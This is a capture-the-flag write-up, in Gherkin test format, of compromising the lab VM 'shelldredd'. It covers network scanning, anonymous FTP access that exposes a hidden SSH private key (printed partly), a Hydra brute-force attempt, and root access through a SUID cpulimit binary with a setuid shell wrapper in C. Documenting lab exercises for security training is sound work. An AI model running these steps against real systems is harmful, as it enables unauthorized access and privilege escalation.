## Version 1.4.1
## language: en

Feature:
  TOE:
    shelldredd
  Category:
    Improper Privilege Management
  Location:
    192.168.1.108
  CWE:
    CWE-284: Improper Access Control
  Rule:
    REQ.341: https://fluidattacks.com/web/rules/341/
  Goal:
    Get shell and privilege escalation
  Recommendation:
    Do not allow default access

  Background:
  Hacker Software:
    | <Software name>   |  <Version> |
    | Kali Linux        |  2020.3    |
    | Nmap              |  7.80      |
    | FTP               |  3.0.3     |
    | SSH               |  7.9       |
    | Hydra             |  9.0       |

  TOE information:
    Given a file with the .OVA file extension is delivered
    Then I run it on virtualbox
    And I realize that a user is required to log in to the system
    Then I proceed to make a scan with nmap on my network with the command
    """
    $ nmap -sn 192.168.1.0/24
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-08 13:25 -05
    Nmap scan report for 192.168.1.50
    Host is up (0.0021s latency).
    MAC Address: CC:35:40:CF:8B:D8 (Technicolor CH USA)
    Nmap scan report for 192.168.1.52
    Host is up (0.00036s latency).
    MAC Address: 2C:6F:C9:1B:64:2F (Hon Hai Precision Ind.)
    Nmap scan report for 192.168.1.53
    Host is up (0.18s latency).
    MAC Address: A4:9B:4F:0B:39:5C (Huawei Technologies)
    Nmap scan report for 192.168.1.55
    Host is up (0.13s latency).
    MAC Address: 5C:51:81:67:01:17 (Samsung Electronics)
    Nmap scan report for 192.168.1.60
    Host is up (0.0034s latency).
    MAC Address: 00:05:8C:2C:F4:D6 (Opentech)
    Nmap scan report for 192.168.1.108
    Host is up (0.0013s latency).
    MAC Address: 08:00:27:F6:E1:D0 (Oracle VirtualBox virtual NIC)
    Nmap scan report for 192.168.1.254
    Host is up (0.012s latency).
    MAC Address: CC:35:40:CF:8B:D6 (Technicolor CH USA)
    Nmap scan report for 192.168.1.69
    Host is up.
    Nmap done: 256 IP addresses (8 hosts up) scanned in 7.47 seconds
    """
    And I determined that the ip of the machine is 192.168.1.108
    And and it has the port 21 open
    """
    $ nmap -sV 192.168.1.108
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-08 14:53 -05
    Nmap scan report for 192.168.1.108
    Host is up (0.00075s latency).
    Not shown: 999 closed ports
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     vsftpd 3.0.3
    Service Info: OS: Unix

    Service detection performed. Please report any incorrect results
    Nmap done: 1 IP address (1 host up) scanned in 1.96 seconds
    """

  Scenario: Normal use case
    Given there is no way to interact with the server
    Then I can't do a normal use case

  Scenario: Static detection
    Given I don't have access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given I only see one port: 21 (vsftpd 3.0.3)
    Then I decide to connect anonymously by this means
    """
    $ ftp 192.168.1.108
    Connected to 192.168.1.108.
    220 (vsFTPd 3.0.3)
    Name (192.168.1.108:usuario): anonymous
    331 Please specify the password.
    Password:
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> ls
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    226 Directory send OK.
    ftp> pwd
    257 "/" is the current directory
    ftp>
    """
    Then I find that there is no file in the / folder
    And I wasted a lot of time researching what it might be
    Then I decided to do a deeper scan because if only port 21 is open
    Then it should be obvious to find something useful there
    And I ran the following command in nmap
    """
    $ sudo nmap -sS -sV --script=default,vuln -p- -T5 192.168.1.108
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-08 13:42 -05
    Nmap scan report for 192.168.1.108
    Host is up (0.00016s latency).
    Not shown: 65533 closed ports
    PORT      STATE SERVICE VERSION
    21/tcp    open  ftp     vsftpd 3.0.3
    |_clamav-exec: ERROR: Script execution failed (use -d to debug)
    |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
    | ftp-syst:
    |   STAT:
    | FTP server status:
    |      Connected to ::ffff:192.168.1.69
    |      Logged in as ftp
    |      TYPE: ASCII
    |      No session bandwidth limit
    |      Session timeout in seconds is 300
    |      Control connection is plain text
    |      Data connections will be plain text
    |      At session startup, client count was 5
    |      vsFTPd 3.0.3 - secure, fast, stable
    |_End of status
    |_sslv2-drown:
    61000/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    |_clamav-exec: ERROR: Script execution failed (use -d to debug)
    | ssh-hostkey:
    |   2048 59:2d:21:0c:2f:af:9d:5a:7b:3e:a4:27:aa:37:89:08 (RSA)
    |   256 59:26:da:44:3b:97:d2:30:b1:9b:9b:02:74:8b:87:58 (ECDSA)
    |_  256 8e:ad:10:4f:e3:3e:65:28:40:cb:5b:bf:1d:24:7f:17 (ED25519)
    | vulners:
    |   cpe:/a:openbsd:openssh:7.9p1:
    |_      CVE-2014-9278   4.0     https://vulners.com/cve/CVE-2014-9278
    MAC Address: 08:00:27:F6:E1:D0 (Oracle VirtualBox virtual NIC)
    Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at
    Nmap done: 1 IP address (1 host up) scanned in 24.52 seconds
    """
    And I found a new port open, 22 (ssh), and vulnerable

  Scenario: Fail:Exploitation
    Given I have a new attack vector
    And a vulnerable service
    Then my idea was try exploit it
    And the first thing that I did was search an exploit for CVE-2014-9278
    Then I did not succeed
    And I decided to brute force the service [evidences](sshbf.png) with Hydra
    """
    $ hydra -l root -P /usr/.../rockyou.txt 192.168.1.108 -s 61000 -t 4 ssh
    Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military

    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-08
    [DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries
    [DATA] attacking ssh://192.168.1.108:61000/
    [STATUS] 44.00 tries/min, 44 tries in 00:01h, 1434435 in 5433:29h, 4 active
    [STATUS] 28.00 tries/min, 84 tries in 00:03h, 1434245 in 8538:17h, 4 active
    [STATUS] 27.43 tries/min, 192 tries in 00:07h, 143207 in 8716:06h, 4 active
    [STATUS] 26.93 tries/min, 404 tries in 00:15h, 143595 in 8876:15h, 4 active
    """
    And again I was unsuccessful

  Scenario: Success:Exploitation with FTP port
    Given I only have 2 ports open, only the ftp port remains
    Then I logged in anonymously again
    And decided to see the hidden files
    """
    $ ftp 192.168.1.108
    Connected to 192.168.1.108.
    220 (vsFTPd 3.0.3)
    Name (192.168.1.108:usuario): anonymous
    331 Please specify the password.
    Password:
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> ls -la
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    drwxr-xr-x    3 0        115          4096 Aug 06 16:56 .
    drwxr-xr-x    3 0        115          4096 Aug 06 16:56 ..
    drwxr-xr-x    2 0        0            4096 Aug 06 16:54 .hannah
    226 Directory send OK.
    ftp> cd .hannah
    250 Directory successfully changed.
    ftp> ls
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    -rwxr-xr-x    1 0        0            1823 Aug 06 16:54 id_rsa
    226 Directory send OK.
    ftp>
    """
    Then I saw a directory called hannah with a file to login via ssh
    And when I get that file I have a private key
    """
    b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
    NhAAAAAwEAAQAAAQEA1+dMq5Furk3CdxomSts5UsflONuLrAhtWzxvzmDk/fwk9ZZJMYSr
    /B76klXVvqrJrZaSPuFhpRiuNr6VybSTrHB3Db7cbJvNrYiovyOOI92fsQ4EDQ1tssS0WR
    ...
    GtlWLJdFmA4Rek1VxEEOskzP/jW9LXn2ebrRd3yG6SEO6o9+uUzLUr3tv9eLSR63Lkh1jz
    n5GAP3ogHwAAA8hHmUHbR5lB2wAAAAdzc2gtcnNhAAABAQDX50yrkW6uTcJ3GiZK2zlSx+
    U424usCG1bPG/OYOT9/CT1lkkxhKv8HvqSVdW+qsmtlpI+4WGlGK42vpXJtJOscHcNvtxs
    ...
    ...
    UsTX8UT1Lok/4t4m0Xpy2fMwh92Z0a2VYsl0WYDhF6TVXEQQ6yTM/+Nb0tefZ5utF3fIbp
    IQ7qj365TMtSve2/14tJHrcuSHWPOfkYA/eiAfAAAAAwEAAQAAAQEAmGDIvfYgtahv7Xtp
    Nz/OD1zBrQVWaI5yEAhxqKi+NXu14ha1hdtrPr/mfU1TVARZ3sf8Y6DSN6FZo42TTg7Cgt
    ...
    ...
    I96Ra9lQolZTZ8orWNkVWrlXF5uiQrbUJ/N5Fld1nvShgYIqSjBKVoFjO5PH4c5aspX5iv
    td/kdikaEKmAAAAIEA8tWZGNKyc+pUslJ3nuiPNZzAZMgSp8ZL65TXx+2D1XxR+OnP2Bcd
    aHsRkeLw4Mu1JYtk1uLHuQ2OUPm1IZT8XtqmuLo1XMKOC5tAxsj0IpgGPoJf8/2xUqz9tK
    LOJK7HN+iwdohkkde9njtfl5Jotq4I5SqKTtIBrtaEjjKZCwUAAACBAOOb6qhGECMwVKCK
    9izhqkaCr5j8gtHYBLkHG1Dot3cS4kYvoJ4Xd6AmGnQvB1Bm2PAIA+LurbXpmEp9sQ9+m8
    Yy9ZpuPiSXuNdUknlGY6kl+ZY46aes/P5pa34Zk1jWOXw68q86tOUus0A1Gbk1wkaWddye
    HvHD9hkCPIq7Sc/TAAAADXJvb3RAT2ZmU2hlbGwBAgMEBQ==
    """
    Then I can connect to host with the file key
    """
    $ ssh hannah@192.168.1.108 -p 61000 -i id_rsa
    Linux ShellDredd 4.19.0-10amd64 #1 SMP Debian 4.19.12-1 (2020-07-24) x86_64
    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Tue Sep  8 21:31:00 2020 from 192.168.1.69
    hannah@ShellDredd:~$ id
    uid=1000(hannah) gid=1000(hannah) grupos=1000(hannah),24(cdrom),25(floppy)
    """

  Scenario: Privilege Scalation
    Given I got shell as user
    Then the idea is get root user privileges
    And for that I must find some way to escalate privileges
    Then what I do is look for executables with super user permissions (root)
    """
    $ find / -perm -u=s -type f 2>/dev/null
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/openssh/ssh-keysign
    /usr/bin/gpasswd
    /usr/bin/newgrp
    /usr/bin/umount
    /usr/bin/mawk
    /usr/bin/chfn
    /usr/bin/su
    /usr/bin/chsh
    /usr/bin/cpulimit
    /usr/bin/mount
    /usr/bin/passwd
    """
    And I found the binary "/usr/bin/cpulimit"
    When I was looking for information from this executable
    Then I found that it is possible to escalate privileges with it
    """
    https://www.hacknos.com/cpulimit-privilege-escalation/
    """
    Then what I did was compile a wrapper
    """
    #include <stdio.h>
    #include <unistd.h>

    int main() {
        setuid(0);
        setgid(0);
        execve("/bin/sh", 0, 0);
    }
    """
    And run the following command
    """
    cpulimit -l 50 -f ./wrapper
    """
    And I got root shell [evidences](root.png)

  Scenario: Remediation
    Do not allow login with default credentials

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      7.6/10 (High) - AV:A/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N/
    Temporal: Attributes that measure the exploit's popularity and fixability
      7.4/10 (High) - E:H/RL:W/RC:C/
    Environmental: Unique and relevant attributes to a specific user environment
      7.8/10 (High) - CR:H/IR:H/AR:L

  Scenario: Correlations
    No correlations have been found to this date {2020-09-08}
